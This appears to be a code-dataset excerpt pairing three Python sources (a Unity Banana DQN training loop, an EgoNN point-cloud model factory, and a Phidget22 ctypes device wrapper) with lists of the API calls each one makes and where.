Linux (x86_64, headless): "path/to/Banana_Linux_NoVis/Banana.x86_64"
"""
# start Unity environment
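# The hard-coded file_name below assumes the macOS build; substitute the
# matching platform-specific path from the list above when running elsewhere.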
env = UnityEnvironment(file_name="Banana.app")
# get the default brain
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
env_info = env.reset(train_mode=False)[brain_name]
action_size = brain.vector_action_space_size
state_size = len(env_info.vector_observations[0])
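# For the Banana environment described in the module docstring this yields
# action_size == 4 and state_size == 37.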
# initialize agent
agent = Agent(state_size=state_size, action_size=action_size, seed=0, device=device)
def train(n_episodes=2000, eps_start=1.0, eps_end=0.05, eps_decay=0.99):
"""Deep Q-Learning.
Params
======
n_episodes (int): maximum number of training episodes
eps_start (float): starting value of epsilon, for epsilon-greedy action selection
eps_end (float): minimum value of epsilon
eps_decay (float): multiplicative factor (per episode) for decreasing epsilon
"""
scores = [] # list containing scores from each episode
scores_window = deque(maxlen=100) # last 100 scores
eps = eps_start # initialize epsilon
for i_episode in range(1, n_episodes+1):
# reset environment
env_info = env.reset(train_mode=True)[brain_name]
# get initial state
state = env_info.vector_observations[0]
# set initial score
score = 0
while True:
action = agent.act(state, eps)
env_info = env.step(action)[brain_name]
next_state, reward, done = env_info.vector_observations[0], env_info.rewards[0], env_info.local_done[0]
agent.step(state, action, reward, next_state, done)
state = next_state
score += reward
if done:
break
scores_window.append(score) # save most recent score
scores.append(score) # save most recent score
eps = max(eps_end, eps_decay*eps) # decrease epsilon
print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="")
if i_episode % 100 == 0:
print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)))
if np.mean(scores_window)>=14:
print('\nEnvironment solved in {:d} episodes!\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))
torch.save(agent.qnetwork_local.state_dict(), 'checkpoint.pth')
break
return scores
train() | [
"numpy.mean",
"collections.deque",
"dqn_agent.Agent",
"unityagents.UnityEnvironment",
"torch.cuda.is_available"
] | [((1524, 1564), 'unityagents.UnityEnvironment', 'UnityEnvironment', ([], {'file_name': '"""Banana.app"""'}), "(file_name='Banana.app')\n", (1540, 1564), False, 'from unityagents import UnityEnvironment\n'), ((1829, 1905), 'dqn_agent.Agent', 'Agent', ([], {'state_size': 'state_size', 'action_size': 'action_size', 'seed': '(0)', 'device': 'device'}), '(state_size=state_size, action_size=action_size, seed=0, device=device)\n', (1834, 1905), False, 'from dqn_agent import Agent\n'), ((2429, 2446), 'collections.deque', 'deque', ([], {'maxlen': '(100)'}), '(maxlen=100)\n', (2434, 2446), False, 'from collections import deque\n'), ((1038, 1063), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1061, 1063), False, 'import torch\n'), ((3653, 3675), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3660, 3675), True, 'import numpy as np\n'), ((3477, 3499), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3484, 3499), True, 'import numpy as np\n'), ((3617, 3639), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3624, 3639), True, 'import numpy as np\n'), ((3785, 3807), 'numpy.mean', 'np.mean', (['scores_window'], {}), '(scores_window)\n', (3792, 3807), True, 'import numpy as np\n')] |
# Warsaw University of Technology
from layers.eca_block import ECABasicBlock
from models.minkgl import MinkHead, MinkTrunk, MinkGL
from models.minkloc import MinkLoc
from third_party.minkloc3d.minkloc import MinkLoc3D
from misc.utils import ModelParams
def model_factory(model_params: ModelParams):
in_channels = 1
if model_params.model == 'MinkLoc':
model = MinkLoc(in_channels=in_channels, feature_size=model_params.feature_size,
output_dim=model_params.output_dim, planes=model_params.planes,
layers=model_params.layers, num_top_down=model_params.num_top_down,
conv0_kernel_size=model_params.conv0_kernel_size, block=model_params.block,
pooling_method=model_params.pooling)
elif model_params.model == 'MinkLoc3D':
model = MinkLoc3D()
elif 'egonn' in model_params.model:
model = create_egonn_model(model_params)
else:
raise NotImplementedError('Model not implemented: {}'.format(model_params.model))
return model
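# create_egonn_model assembles the EgoNN-style network: a sparse convolutional
# trunk plus separate global and local heads fed from the trunk levels chosen
# below, wrapped in MinkGL with GeM pooling for the global descriptor.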
def create_egonn_model(model_params: ModelParams):
model_name = model_params.model
global_normalize = False
local_normalize = True
if model_name == 'egonn':
# THIS IS OUR BEST MODEL
block = ECABasicBlock
planes = [32, 64, 64, 128, 128, 128, 128]
layers = [1, 1, 1, 1, 1, 1, 1]
global_in_levels = [5, 6, 7]
global_map_channels = 128
global_descriptor_size = 256
local_in_levels = [3, 4]
local_map_channels = 64
local_descriptor_size = 128
else:
raise NotImplementedError(f'Unknown model: {model_name}')
    # The planes list gives the number of channels for level 1 and above
global_in_channels = [planes[i-1] for i in global_in_levels]
head_global = MinkHead(global_in_levels, global_in_channels, global_map_channels)
if len(local_in_levels) > 0:
local_in_channels = [planes[i-1] for i in local_in_levels]
head_local = MinkHead(local_in_levels, local_in_channels, local_map_channels)
else:
head_local = None
min_out_level = len(planes)
if len(global_in_levels) > 0:
min_out_level = min(min_out_level, min(global_in_levels))
if len(local_in_levels) > 0:
min_out_level = min(min_out_level, min(local_in_levels))
trunk = MinkTrunk(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5, block=block,
min_out_level=min_out_level)
net = MinkGL(trunk, local_head=head_local, local_descriptor_size=local_descriptor_size,
local_normalize=local_normalize, global_head=head_global,
global_descriptor_size=global_descriptor_size, global_pool_method='GeM',
global_normalize=global_normalize, quantizer=model_params.quantizer)
return net | [
"models.minkgl.MinkHead",
"models.minkgl.MinkGL",
"models.minkloc.MinkLoc",
"models.minkgl.MinkTrunk",
"third_party.minkloc3d.minkloc.MinkLoc3D"
] | [((1835, 1902), 'models.minkgl.MinkHead', 'MinkHead', (['global_in_levels', 'global_in_channels', 'global_map_channels'], {}), '(global_in_levels, global_in_channels, global_map_channels)\n', (1843, 1902), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((2370, 2491), 'models.minkgl.MinkTrunk', 'MinkTrunk', ([], {'in_channels': '(1)', 'planes': 'planes', 'layers': 'layers', 'conv0_kernel_size': '(5)', 'block': 'block', 'min_out_level': 'min_out_level'}), '(in_channels=1, planes=planes, layers=layers, conv0_kernel_size=5,\n block=block, min_out_level=min_out_level)\n', (2379, 2491), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((2521, 2821), 'models.minkgl.MinkGL', 'MinkGL', (['trunk'], {'local_head': 'head_local', 'local_descriptor_size': 'local_descriptor_size', 'local_normalize': 'local_normalize', 'global_head': 'head_global', 'global_descriptor_size': 'global_descriptor_size', 'global_pool_method': '"""GeM"""', 'global_normalize': 'global_normalize', 'quantizer': 'model_params.quantizer'}), "(trunk, local_head=head_local, local_descriptor_size=\n local_descriptor_size, local_normalize=local_normalize, global_head=\n head_global, global_descriptor_size=global_descriptor_size,\n global_pool_method='GeM', global_normalize=global_normalize, quantizer=\n model_params.quantizer)\n", (2527, 2821), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((381, 716), 'models.minkloc.MinkLoc', 'MinkLoc', ([], {'in_channels': 'in_channels', 'feature_size': 'model_params.feature_size', 'output_dim': 'model_params.output_dim', 'planes': 'model_params.planes', 'layers': 'model_params.layers', 'num_top_down': 'model_params.num_top_down', 'conv0_kernel_size': 'model_params.conv0_kernel_size', 'block': 'model_params.block', 'pooling_method': 'model_params.pooling'}), '(in_channels=in_channels, feature_size=model_params.feature_size,\n output_dim=model_params.output_dim, planes=model_params.planes, layers=\n model_params.layers, num_top_down=model_params.num_top_down,\n conv0_kernel_size=model_params.conv0_kernel_size, block=model_params.\n block, pooling_method=model_params.pooling)\n', (388, 716), False, 'from models.minkloc import MinkLoc\n'), ((2025, 2089), 'models.minkgl.MinkHead', 'MinkHead', (['local_in_levels', 'local_in_channels', 'local_map_channels'], {}), '(local_in_levels, local_in_channels, local_map_channels)\n', (2033, 2089), False, 'from models.minkgl import MinkHead, MinkTrunk, MinkGL\n'), ((856, 867), 'third_party.minkloc3d.minkloc.MinkLoc3D', 'MinkLoc3D', ([], {}), '()\n', (865, 867), False, 'from third_party.minkloc3d.minkloc import MinkLoc3D\n')] |
import sys
import ctypes
from Phidget22.PhidgetSupport import PhidgetSupport
from Phidget22.Async import *
from Phidget22.ChannelClass import ChannelClass
from Phidget22.ChannelSubclass import ChannelSubclass
from Phidget22.DeviceClass import DeviceClass
from Phidget22.DeviceID import DeviceID
from Phidget22.ErrorEventCode import ErrorEventCode
from Phidget22.PhidgetException import PhidgetException
class Phidget:
def __init__(self):
self.handle = ctypes.c_void_p()
if sys.platform == 'win32':
self._AttachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
else:
self._AttachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
self._Attach = None
self._onAttach = None
if sys.platform == 'win32':
self._DetachFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
else:
self._DetachFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p)
self._Detach = None
self._onDetach = None
if sys.platform == 'win32':
self._ErrorFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p)
else:
self._ErrorFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int, ctypes.c_char_p)
self._Error = None
self._onError = None
if sys.platform == 'win32':
self._PropertyChangeFactory = ctypes.WINFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)
else:
self._PropertyChangeFactory = ctypes.CFUNCTYPE(None, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_char_p)
self._PropertyChange = None
self._onPropertyChange = None
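	# Each event uses a platform-specific callback factory (WINFUNCTYPE on
	# Windows, CFUNCTYPE elsewhere). Both the user handler (self._X) and the
	# generated C callback (self._onX) are stored on the instance so the
	# callback object cannot be garbage collected while the native library
	# still holds a pointer to it.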
def __eq__(self, other):
return hasattr(other, 'handle') and self.handle.value == other.handle.value
def __hash__(self):
return self.handle.value
def __str__(self):
_value = (ctypes.c_char * 65536)()
_valueLen = ctypes.c_int32(65536)
if self.getIsChannel():
__func = PhidgetSupport.getDll().channelInfo
else:
__func = PhidgetSupport.getDll().deviceInfo
result = __func(self.handle, ctypes.byref(_value), _valueLen)
		return _value.value.decode('utf-8')
def __del__(self):
__func = PhidgetSupport.getDll().Phidget_delete
__func.restype = ctypes.c_int32
res = __func(ctypes.byref(self.handle))
self.handle = None
if res > 0:
raise PhidgetException(res)
def _localAttachEvent(self, handle, userPtr):
if self._Attach == None:
return
self._Attach(self)
def setOnAttachHandler(self, handler):
if handler == None:
self._Attach = None
self._onAttach = None
else:
self._Attach = handler
self._onAttach = self._AttachFactory(self._localAttachEvent)
try:
__func = PhidgetSupport.getDll().Phidget_setOnAttachHandler
__func.restype = ctypes.c_int32
res = __func(self.handle, self._onAttach, None)
except RuntimeError:
self._Attach = None
self._onAttach = None
def _localDetachEvent(self, handle, userPtr):
if self._Detach == None:
return
self._Detach(self)
def setOnDetachHandler(self, handler):
if handler == None:
self._Detach = None
self._onDetach = None
else:
self._Detach = handler
self._onDetach = self._DetachFactory(self._localDetachEvent)
try:
__func = PhidgetSupport.getDll().Phidget_setOnDetachHandler
__func.restype = ctypes.c_int32
res = __func(self.handle, self._onDetach, None)
except RuntimeError:
self._Detach = None
self._onDetach = None
def _localErrorEvent(self, handle, userPtr, Code, Description):
if self._Error == None:
return
Description = Description.decode('utf-8')
self._Error(self, Code, Description)
def setOnErrorHandler(self, handler):
if handler == None:
self._Error = None
self._onError = None
else:
self._Error = handler
self._onError = self._ErrorFactory(self._localErrorEvent)
try:
__func = PhidgetSupport.getDll().Phidget_setOnErrorHandler
__func.restype = ctypes.c_int32
res = __func(self.handle, self._onError, None)
except RuntimeError:
self._Error = None
self._onError = None
def _localPropertyChangeEvent(self, handle, userPtr, propertyName):
if self._PropertyChange == None:
return
propertyName = propertyName.decode('utf-8')
self._PropertyChange(self, propertyName)
def setOnPropertyChangeHandler(self, handler):
if handler == None:
self._PropertyChange = None
self._onPropertyChange = None
else:
self._PropertyChange = handler
self._onPropertyChange = self._PropertyChangeFactory(self._localPropertyChangeEvent)
try:
__func = PhidgetSupport.getDll().Phidget_setOnPropertyChangeHandler
__func.restype = ctypes.c_int32
res = __func(self.handle, self._onPropertyChange, None)
except RuntimeError:
self._PropertyChange = None
self._onPropertyChange = None
@staticmethod
def finalize(flags):
_flags = ctypes.c_int32(flags)
__func = PhidgetSupport.getDll().Phidget_finalize
__func.restype = ctypes.c_int32
result = __func(_flags)
if result > 0:
raise PhidgetException(result)
@staticmethod
def getLibraryVersion():
_LibraryVersion = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getLibraryVersion
__func.restype = ctypes.c_int32
result = __func(ctypes.byref(_LibraryVersion))
if result > 0:
raise PhidgetException(result)
return _LibraryVersion.value.decode('utf-8')
@staticmethod
def getLibraryVersionNumber():
_LibraryVersionNumber = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getLibraryVersionNumber
__func.restype = ctypes.c_int32
result = __func(ctypes.byref(_LibraryVersionNumber))
if result > 0:
raise PhidgetException(result)
return _LibraryVersionNumber.value.decode('utf-8')
@staticmethod
def resetLibrary():
__func = PhidgetSupport.getDll().Phidget_resetLibrary
__func.restype = ctypes.c_int32
result = __func()
if result > 0:
raise PhidgetException(result)
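	# The accessors below all follow the same pattern: allocate a ctypes
	# out-parameter, call the matching Phidget22 C function, raise
	# PhidgetException on a nonzero return code, and return the decoded value.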
def getAttached(self):
_Attached = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getAttached
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_Attached))
if result > 0:
raise PhidgetException(result)
return _Attached.value
def getChannel(self):
_Channel = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getChannel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_Channel))
if result > 0:
raise PhidgetException(result)
return _Channel.value
def setChannel(self, Channel):
_Channel = ctypes.c_int(Channel)
__func = PhidgetSupport.getDll().Phidget_setChannel
__func.restype = ctypes.c_int32
result = __func(self.handle, _Channel)
if result > 0:
raise PhidgetException(result)
def getChannelClass(self):
_ChannelClass = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getChannelClass
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ChannelClass))
if result > 0:
raise PhidgetException(result)
return _ChannelClass.value
def getChannelClassName(self):
_ChannelClassName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getChannelClassName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ChannelClassName))
if result > 0:
raise PhidgetException(result)
return _ChannelClassName.value.decode('utf-8')
def getChannelName(self):
_ChannelName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getChannelName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ChannelName))
if result > 0:
raise PhidgetException(result)
return _ChannelName.value.decode('utf-8')
def getChannelSubclass(self):
_ChannelSubclass = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getChannelSubclass
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ChannelSubclass))
if result > 0:
raise PhidgetException(result)
return _ChannelSubclass.value
def close(self):
__func = PhidgetSupport.getDll().Phidget_close
__func.restype = ctypes.c_int32
result = __func(self.handle)
if result > 0:
raise PhidgetException(result)
def getDeviceChannelCount(self, cls):
_cls = ctypes.c_int(cls)
_count = ctypes.c_uint32()
__func = PhidgetSupport.getDll().Phidget_getDeviceChannelCount
__func.restype = ctypes.c_int32
result = __func(self.handle, _cls, ctypes.byref(_count))
if result > 0:
raise PhidgetException(result)
return _count.value
def getDeviceClass(self):
_DeviceClass = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getDeviceClass
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceClass))
if result > 0:
raise PhidgetException(result)
return _DeviceClass.value
def getDeviceClassName(self):
_DeviceClassName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getDeviceClassName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceClassName))
if result > 0:
raise PhidgetException(result)
return _DeviceClassName.value.decode('utf-8')
def getDeviceID(self):
_DeviceID = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getDeviceID
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceID))
if result > 0:
raise PhidgetException(result)
return _DeviceID.value
def getDeviceLabel(self):
_DeviceLabel = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getDeviceLabel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceLabel))
if result > 0:
raise PhidgetException(result)
return _DeviceLabel.value.decode('utf-8')
def setDeviceLabel(self, DeviceLabel):
_DeviceLabel = ctypes.create_string_buffer(DeviceLabel.encode('utf-8'))
__func = PhidgetSupport.getDll().Phidget_setDeviceLabel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceLabel))
if result > 0:
raise PhidgetException(result)
def getDeviceName(self):
_DeviceName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getDeviceName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceName))
if result > 0:
raise PhidgetException(result)
return _DeviceName.value.decode('utf-8')
def getDeviceSerialNumber(self):
_DeviceSerialNumber = ctypes.c_int32()
__func = PhidgetSupport.getDll().Phidget_getDeviceSerialNumber
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceSerialNumber))
if result > 0:
raise PhidgetException(result)
return _DeviceSerialNumber.value
def setDeviceSerialNumber(self, DeviceSerialNumber):
_DeviceSerialNumber = ctypes.c_int32(DeviceSerialNumber)
__func = PhidgetSupport.getDll().Phidget_setDeviceSerialNumber
__func.restype = ctypes.c_int32
result = __func(self.handle, _DeviceSerialNumber)
if result > 0:
raise PhidgetException(result)
def getDeviceSKU(self):
_DeviceSKU = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getDeviceSKU
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceSKU))
if result > 0:
raise PhidgetException(result)
return _DeviceSKU.value.decode('utf-8')
def getDeviceVersion(self):
_DeviceVersion = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getDeviceVersion
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_DeviceVersion))
if result > 0:
raise PhidgetException(result)
return _DeviceVersion.value
def getHub(self):
_Hub = ctypes.c_void_p()
__func = PhidgetSupport.getDll().Phidget_getHub
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_Hub))
if result > 0:
raise PhidgetException(result)
__Hub = Phidget()
__Hub.handle = _Hub
return __Hub
def getHubPort(self):
_HubPort = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getHubPort
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_HubPort))
if result > 0:
raise PhidgetException(result)
return _HubPort.value
def setHubPort(self, HubPort):
_HubPort = ctypes.c_int(HubPort)
__func = PhidgetSupport.getDll().Phidget_setHubPort
__func.restype = ctypes.c_int32
result = __func(self.handle, _HubPort)
if result > 0:
raise PhidgetException(result)
def getHubPortCount(self):
_HubPortCount = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getHubPortCount
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_HubPortCount))
if result > 0:
raise PhidgetException(result)
return _HubPortCount.value
def getHubPortSpeed(self):
_HubPortSpeed = ctypes.c_uint32()
__func = PhidgetSupport.getDll().Phidget_getHubPortSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_HubPortSpeed))
if result > 0:
raise PhidgetException(result)
return _HubPortSpeed.value
def setHubPortSpeed(self, HubPortSpeed):
_HubPortSpeed = ctypes.c_uint32(HubPortSpeed)
__func = PhidgetSupport.getDll().Phidget_setHubPortSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, _HubPortSpeed)
if result > 0:
raise PhidgetException(result)
def getMaxHubPortSpeed(self):
_MaxHubPortSpeed = ctypes.c_uint32()
__func = PhidgetSupport.getDll().Phidget_getMaxHubPortSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_MaxHubPortSpeed))
if result > 0:
raise PhidgetException(result)
return _MaxHubPortSpeed.value
def getHubPortSupportsSetSpeed(self):
_HubPortSupportsSetSpeed = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getHubPortSupportsSetSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_HubPortSupportsSetSpeed))
if result > 0:
raise PhidgetException(result)
return _HubPortSupportsSetSpeed.value
def getIsChannel(self):
_IsChannel = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getIsChannel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_IsChannel))
if result > 0:
raise PhidgetException(result)
return _IsChannel.value
def getIsHubPortDevice(self):
_IsHubPortDevice = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getIsHubPortDevice
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_IsHubPortDevice))
if result > 0:
raise PhidgetException(result)
return _IsHubPortDevice.value
def setIsHubPortDevice(self, IsHubPortDevice):
_IsHubPortDevice = ctypes.c_int(IsHubPortDevice)
__func = PhidgetSupport.getDll().Phidget_setIsHubPortDevice
__func.restype = ctypes.c_int32
result = __func(self.handle, _IsHubPortDevice)
if result > 0:
raise PhidgetException(result)
def getIsLocal(self):
_IsLocal = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getIsLocal
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_IsLocal))
if result > 0:
raise PhidgetException(result)
return _IsLocal.value
def setIsLocal(self, IsLocal):
_IsLocal = ctypes.c_int(IsLocal)
__func = PhidgetSupport.getDll().Phidget_setIsLocal
__func.restype = ctypes.c_int32
result = __func(self.handle, _IsLocal)
if result > 0:
raise PhidgetException(result)
def getIsRemote(self):
_IsRemote = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getIsRemote
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_IsRemote))
if result > 0:
raise PhidgetException(result)
return _IsRemote.value
def setIsRemote(self, IsRemote):
_IsRemote = ctypes.c_int(IsRemote)
__func = PhidgetSupport.getDll().Phidget_setIsRemote
__func.restype = ctypes.c_int32
result = __func(self.handle, _IsRemote)
if result > 0:
raise PhidgetException(result)
def open(self):
__func = PhidgetSupport.getDll().Phidget_open
__func.restype = ctypes.c_int32
result = __func(self.handle)
if result > 0:
raise PhidgetException(result)
def openWaitForAttachment(self, timeout):
_timeout = ctypes.c_uint32(timeout)
__func = PhidgetSupport.getDll().Phidget_openWaitForAttachment
__func.restype = ctypes.c_int32
result = __func(self.handle, _timeout)
if result > 0:
raise PhidgetException(result)
def getParent(self):
_Parent = ctypes.c_void_p()
__func = PhidgetSupport.getDll().Phidget_getParent
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_Parent))
if result > 0:
raise PhidgetException(result)
__Parent = Phidget()
__Parent.handle = _Parent
return __Parent
def getServerHostname(self):
_ServerHostname = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getServerHostname
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerHostname))
if result > 0:
raise PhidgetException(result)
return _ServerHostname.value.decode('utf-8')
def getServerName(self):
_ServerName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getServerName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerName))
if result > 0:
raise PhidgetException(result)
return _ServerName.value.decode('utf-8')
def setServerName(self, ServerName):
_ServerName = ctypes.create_string_buffer(ServerName.encode('utf-8'))
__func = PhidgetSupport.getDll().Phidget_setServerName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerName))
if result > 0:
raise PhidgetException(result)
def getServerPeerName(self):
_ServerPeerName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getServerPeerName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerPeerName))
if result > 0:
raise PhidgetException(result)
return _ServerPeerName.value.decode('utf-8')
def getServerUniqueName(self):
_ServerUniqueName = ctypes.c_char_p()
__func = PhidgetSupport.getDll().Phidget_getServerUniqueName
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_ServerUniqueName))
if result > 0:
raise PhidgetException(result)
return _ServerUniqueName.value.decode('utf-8')
def getMaxVINTDeviceSpeed(self):
_MaxVINTDeviceSpeed = ctypes.c_uint32()
__func = PhidgetSupport.getDll().Phidget_getMaxVINTDeviceSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_MaxVINTDeviceSpeed))
if result > 0:
raise PhidgetException(result)
return _MaxVINTDeviceSpeed.value
def getVINTDeviceSupportsSetSpeed(self):
_VINTDeviceSupportsSetSpeed = ctypes.c_int()
__func = PhidgetSupport.getDll().Phidget_getVINTDeviceSupportsSetSpeed
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_VINTDeviceSupportsSetSpeed))
if result > 0:
raise PhidgetException(result)
return _VINTDeviceSupportsSetSpeed.value
def writeDeviceLabel(self, deviceLabel):
_deviceLabel = ctypes.create_string_buffer(deviceLabel.encode('utf-8'))
__func = PhidgetSupport.getDll().Phidget_writeDeviceLabel
__func.restype = ctypes.c_int32
result = __func(self.handle, ctypes.byref(_deviceLabel))
if result > 0:
raise PhidgetException(result)
ANY_SERIAL_NUMBER = -1
ANY_HUB_PORT = -1
ANY_CHANNEL = -1
ANY_LABEL = None
INFINITE_TIMEOUT = 0
DEFAULT_TIMEOUT = 1000
| [
"ctypes.CFUNCTYPE",
"ctypes.c_uint32",
"ctypes.byref",
"ctypes.c_int32",
"Phidget22.PhidgetSupport.PhidgetSupport.getDll",
"Phidget22.PhidgetException.PhidgetException",
"ctypes.WINFUNCTYPE",
"ctypes.c_int",
"ctypes.c_void_p",
"ctypes.c_char_p"
] | [((457, 474), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (472, 474), False, 'import ctypes\n'), ((1830, 1851), 'ctypes.c_int32', 'ctypes.c_int32', (['(65536)'], {}), '(65536)\n', (1844, 1851), False, 'import ctypes\n'), ((4772, 4793), 'ctypes.c_int32', 'ctypes.c_int32', (['flags'], {}), '(flags)\n', (4786, 4793), False, 'import ctypes\n'), ((5022, 5039), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (5037, 5039), False, 'import ctypes\n'), ((5359, 5376), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (5374, 5376), False, 'import ctypes\n'), ((5879, 5893), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (5891, 5893), False, 'import ctypes\n'), ((6155, 6169), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (6167, 6169), False, 'import ctypes\n'), ((6437, 6458), 'ctypes.c_int', 'ctypes.c_int', (['Channel'], {}), '(Channel)\n', (6449, 6458), False, 'import ctypes\n'), ((6689, 6703), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (6701, 6703), False, 'import ctypes\n'), ((6995, 7012), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (7010, 7012), False, 'import ctypes\n'), ((7322, 7339), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (7337, 7339), False, 'import ctypes\n'), ((7642, 7656), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (7654, 7656), False, 'import ctypes\n'), ((8137, 8154), 'ctypes.c_int', 'ctypes.c_int', (['cls'], {}), '(cls)\n', (8149, 8154), False, 'import ctypes\n'), ((8166, 8183), 'ctypes.c_uint32', 'ctypes.c_uint32', ([], {}), '()\n', (8181, 8183), False, 'import ctypes\n'), ((8463, 8477), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (8475, 8477), False, 'import ctypes\n'), ((8764, 8781), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (8779, 8781), False, 'import ctypes\n'), ((9082, 9096), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (9094, 9096), False, 'import ctypes\n'), ((9366, 9383), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (9381, 9383), False, 'import ctypes\n'), ((9996, 10013), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (10011, 10013), False, 'import ctypes\n'), ((10319, 10335), 'ctypes.c_int32', 'ctypes.c_int32', ([], {}), '()\n', (10333, 10335), False, 'import ctypes\n'), ((10669, 10703), 'ctypes.c_int32', 'ctypes.c_int32', (['DeviceSerialNumber'], {}), '(DeviceSerialNumber)\n', (10683, 10703), False, 'import ctypes\n'), ((10950, 10967), 'ctypes.c_char_p', 'ctypes.c_char_p', ([], {}), '()\n', (10965, 10967), False, 'import ctypes\n'), ((11260, 11274), 'ctypes.c_int', 'ctypes.c_int', ([], {}), '()\n', (11272, 11274), False, 'import ctypes\n'), ((11543, 11560), 'ctypes.c_void_p', 'ctypes.c_void_p', ([], {}), '()\n', (11558, 11560), False, 'import ctypes\n'), ((11844, 11858), 'ctypes.c_int', 